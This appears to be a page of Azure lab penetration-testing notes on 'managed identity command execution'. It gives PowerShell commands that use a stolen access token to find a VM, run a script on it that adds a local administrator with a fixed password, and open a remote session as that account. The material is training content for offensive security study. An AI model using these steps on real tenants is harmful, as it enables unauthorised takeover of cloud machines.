Managed Identity Command Execution

This attack involves having already compromised the managed identity of an app and enumeration of any VMs that it can execute commands on.

This example adds a local administrator, but relies on local accounts being allowed to connect remotely.

Use previous examples to steal an access token

$AccessToken = 'eyJ0…'
Connect-AzAccount -AccessToken $AccessToken -AccountId 064aaf57-30af-41f0-840a-0e21ed149946

Check for public IP of VM

Get-AzVM -Name bkpadconnect -ResourceGroupName Engineering | select -ExpandProperty NetworkProfile

Get details of network interface

Get-AzNetworkInterface -Name bkpadconnect368

Use the last string of the previous command after /.

Get the public IP of the VM

Get-AzPublicIpAddress -Name bkpadconnectIP

Run a script

For example, adding a user as Administrator

Invoke-AzVMRunCommand -VMName bkpadconnect -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath 'C:\AzAD\Tools\adduser.ps1' -Verbose

$passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force
New-LocalUser -Name studentX -Password $passwd
Add-LocalGroupMember -Group Administrators -Member studentx

Connect

$password = ConvertTo-SecureString 'StudxPassword@123' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('studentx', $Password)
$sess = New-PSSession -ComputerName 20.52.148.232 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess

PreviousAutomation Account NextKey Vault

Last updated 11 hours ago